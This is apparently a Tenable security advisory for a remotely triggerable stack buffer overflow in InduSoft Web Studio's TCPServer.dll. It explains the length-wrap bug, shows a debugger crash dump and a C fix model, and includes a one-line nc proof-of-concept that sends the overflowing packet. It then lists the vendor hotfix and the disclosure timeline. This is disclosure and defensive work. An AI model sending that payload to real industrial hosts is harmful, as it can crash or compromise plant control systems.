
[R1] AVEVA InduSoft Web Studio and InTouch Machine Edition Remote Code Execution

Critical

Synopsis

Tenable found a stack buffer overflow vulnerability in TCPServer.dll while developing a Nessus plugin for CVE-2018-8840. To understand the vulnerability, a description of the WSTR structure in TCPServer.dll is useful. The WSTR class is used to store wide-character strings:

 class WSTR
 {
     void **vftable;              // virtual function table pointer
     unsigned short lbuf[0x40];   // local storage for the string data
     void *pData;                 // ptr to string data; can point to @lbuf
     int32_t DataLen;             // length allocated for @pData
     ...
 };

Strings shorter than 0x40 bytes are stored in the lbuf array. Otherwise, heap memory is allocated and pData and DataLen are updated accordingly.

When processing command 81, TCPServer.dll tries to read a string into a WSTR object. To determine whether the string should be stored in lbuf or in a heap-allocated buffer, TCPServer.dll first reads the string length. The user-provided length is incremented by one to account for a null terminator and compared against 0x40. If the length + 1 is less than 0x40, the string is stored in lbuf. A remote unauthenticated attacker can abuse this by providing a length of 0xffffffff. When one is added, the length rolls over to zero, which causes TCPServer.dll to try to store the string in lbuf. The server then attempts to copy 0xffffffff bytes into lbuf, resulting in the following stack buffer overflow:

STATUS_STACK_BUFFER_OVERRUN encountered
(9e8.b28): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=5d15b708 ecx=766ce4b4 edx=0e76efb9 esi=00000000 edi=00ec2870
eip=766ce331 esp=0e76f200 ebp=0e76f27c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
kernel32!UnhandledExceptionFilter+0x5f:
766ce331 cc              int     3
0:020> kb
 # ChildEBP RetAddr  Args to Child              
00 0e76f27c 694c00f1 5d15b708 0e76f298 5d133403 kernel32!UnhandledExceptionFilter+0x5f
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\InduSoft Web Studio v8.1\Bin\TCPSERVER.DLL - 
01 0e76f288 5d133403 5d15b708 00000001 0e76f5c8 MSVCR110!__crtUnhandledException+0x14
WARNING: Stack unwind information not available. Following frames may be wrong.
02 0e76f298 5d13351a 5d15b708 00000010 00000044 TCPSERVER!_StudioSetLanguage__+0x1653
03 0e76f5c8 5d0bdbff 049ecae8 049ecb18 049ecb18 TCPSERVER!_StudioSetLanguage__+0x176a
04 0e76f7ec 00410041 00410041 00410041 00410041 TCPSERVER+0x3dbff
05 0e76f7f0 00410041 00410041 00410041 00410041 0x410041
06 0e76f7f4 00410041 00410041 00410041 00410041 0x410041
07 0e76f7f8 00410041 00410041 00410041 00410041 0x410041
[...]
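The length check described above, modelled in C as an added example (not TCPServer.dll's own code): the vulnerable predicate adds the terminator before comparing, so 0xffffffff wraps to 0 and selects lbuf, while the hardened version compares first and also bounds the copy by the bytes actually received. The wstr_t layout, the function names and the sample input are assumptions for illustration.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define WSTR_LOCAL_CHARS 0x40   /* size of lbuf in the WSTR layout above */

/* Hypothetical stand-in for the WSTR object (vftable omitted). */
typedef struct {
    uint16_t  lbuf[WSTR_LOCAL_CHARS];
    uint16_t *pData;
    uint32_t  DataLen;
} wstr_t;

/* Vulnerable predicate: adds the terminator before comparing, so a
 * length of 0xffffffff wraps to 0 and wrongly selects lbuf. */
bool vuln_fits_in_lbuf(uint32_t len) {
    uint32_t with_nul = len + 1;           /* unsigned wrap-around */
    return with_nul < WSTR_LOCAL_CHARS;
}

/* Hardened predicate: compare before adding, so nothing can wrap. */
bool safe_fits_in_lbuf(uint32_t len) {
    return len < WSTR_LOCAL_CHARS - 1;     /* leaves room for the terminator */
}

/* Hardened read of a length-prefixed UTF-16LE string into lbuf.
 * Returns 0 on success, -2 if the string needs the heap path (not
 * modelled here), -1 if the declared length is unsafe or exceeds the
 * bytes actually available on the wire. */
int wstr_read_safe(wstr_t *s, const uint8_t *in, size_t in_len, uint32_t declared) {
    if (declared > UINT32_MAX / 2)        /* declared * 2 must not overflow */
        return -1;
    if (!safe_fits_in_lbuf(declared))
        return -2;
    size_t nbytes = (size_t)declared * 2;
    if (nbytes > in_len)                  /* never trust the wire length */
        return -1;
    memcpy(s->lbuf, in, nbytes);
    s->lbuf[declared] = 0;
    s->pData = s->lbuf;
    s->DataLen = WSTR_LOCAL_CHARS;
    return 0;
}

/* Constructed sample input: the UTF-16LE string "ABCD" (4 chars, 8 bytes). */
static const uint8_t SAMPLE[] = { 'A',0, 'B',0, 'C',0, 'D',0 };

/* Drives wstr_read_safe against SAMPLE for a given declared length. */
int demo_read(uint32_t declared) {
    wstr_t s;
    return wstr_read_safe(&s, SAMPLE, sizeof SAMPLE, declared);
}
```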

The following commands will recreate the issue:

cat <(echo -ne '\x02\x31\x10\x31\x10\x38\x10\x32\x10\x32\x03\x02\x51\xff\xff\xff\xff\xff\xff\xff'`python -c "print 'A'*1000"`'\x03') - | nc <target_host> 1234

Solution

AVEVA has released updates InduSoft Web Studio Hotfix 81.1.00.08 and InTouch Machine Edition Hotfix 81.1.00.08 to address this vulnerability.

Disclosure Timeline

04-23-2018: Vulnerability discovered.
04-24-2018: Having issues with the Schneider vulnerability reporting web form, Tenable asks a previous contact who the appropriate email contact should be for vuln disclosure.
04-24-2018: Schneider provides the appropriate contact.
04-24-2018: Tenable discloses via encrypted email. Informs Schneider of disclosure deadline of July 24, 2018.
04-24-2018: Schneider acknowledges vulnerability. Assigns LFSec00000128.
06-04-2018: Schneider provides a test build for Tenable to look at.
06-05-2018: Tenable acknowledges the new build.
06-05-2018: Tenable confirms the fix in the test build.
06-25-2018: Schneider says Aveva advisory likely going out on the 29th. Asks Tenable about plans to disclose.
06-25-2018: Tenable explains policy. Asks for notification when the Aveva advisory is published.
06-26-2018: Schneider acknowledges Tenable's request.
06-29-2018: Tenable asks if the advisory is coming out today.
06-29-2018: Schneider responds that the advisory will be delayed at least another week.
07-03-2018: Schneider finds additional issues. Delaying release further. Asks about extending 90 days.
07-03-2018: Tenable acknowledges and informs Schneider that extending the 90 days is not possible under our disclosure policy.
07-12-2018: Schneider indicates advisory release tomorrow (July 13).
07-13-2018: Schneider sends Aveva branded advisory to Tenable.
07-13-2018: Tenable asks if the advisory will be published today.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

CVE ID: CVE-2018-10620
Tenable Advisory ID: TRA-2018-19
CVSSv2 Base / Temporal Score: 10.0 / 7.8
CVSSv2 Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Nessus Plugin ID: 111466
Affected Products:
InduSoft Web Studio v8.1 and below
InTouch Machine Edition 2017 v8.1 and below
Risk Factor: Critical
Additional Keywords:
LFSec00000128
ICSA-18-200-01

Advisory Timeline

07-18-2018 - [R1] Initial Release
07-25-2018 - [R2] Added ICS-CERT advisory